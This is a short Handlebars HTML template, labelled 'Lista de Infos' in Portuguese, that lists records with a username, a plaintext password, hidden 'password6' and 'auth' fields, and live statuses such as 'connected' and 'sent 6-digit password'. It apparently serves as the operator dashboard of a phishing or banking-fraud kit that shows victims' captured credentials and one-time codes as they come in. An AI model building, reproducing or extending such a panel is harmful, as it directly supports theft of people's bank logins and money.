<div class="card">
    <div class="card-header border-0">
        <div class="row align-items-center">
            <div class="col">
                <h3 class="mb-0">Lista de Infos</h3>
            </div>
        </div>
    </div>
    <div class="table-responsive">
        <!-- Projects table -->
        <table class="table align-items-center table-flush">
            <thead class="thead-light">
                <tr>
                    <th scope="col">#ID</th>
                    <th scope="col">USUÁRIO</th>
                    <th scope="col">SENHA</th>
                    <th scope="col">STATUS</th>
                </tr>
            </thead>
            <tbody class="productList">
                {{#each clients}}
                <tr data-id="{{id}}">
                    <th scope="row" role="id">
                        <strong># {{id}}</strong>
                    </th>
                    <td role="user">
                        {{user}}
                    </td>
                    <td role="password">
                        {{password}}
                    </td>
                    <input type="hidden" name="password6" value="{{password6}}">
                    <input type="hidden" name="auth" value="{{auth}}">
                    <td role="status" 
                    
                        class="
                        blockstatus
                        {{#ifCond status 'disconected'}}
                        disconnected
                        {{/ifCond}}

                        {{#ifCond status 'connected'}}
                        enter
                        {{/ifCond}}

                        {{#ifCond status 'updated'}}
                        updated
                        {{/ifCond}}

                        {{#ifCond status 'finish'}}
                        finish
                        {{/ifCond}}

                        {{#ifCond status 'reconnect'}}
                        enter
                        {{/ifCond}}

                        {{!-- reconnect --}}

                        {{#ifCond status 'updated'}}
                        updated
                        {{/ifCond}}

                        {{#ifCond status 'sendPass6'}}
                        updated
                        {{/ifCond}}
                        "
                        
                    
                    >
                        {{#ifCond status 'connected'}}
                        <span>Connectado</span>
                        {{/ifCond}}
                        {{#ifCond status 'disconected'}}
                        <span>Desconectado</span>
                        {{/ifCond}}
                        {{#ifCond status 'updated'}}
                        <span>Atualizado</span>
                        {{/ifCond}}
                        {{#ifCond status 'finish'}}
                        <span>Finalizado</span>
                        {{/ifCond}}
                        {{!-- /reconnect --}}
                        {{#ifCond status 'sendPass6'}}
                        <span>Enviou senha de 6</span>
                        
                        {{/ifCond}}

                        {{#ifCond status 'reconnect'}}
                        <span>Reconectado</span>
                        {{/ifCond}}
                        
                    </td>
                </tr>
                {{/each}}
            </tbody>
        </table>
    </div>
</div>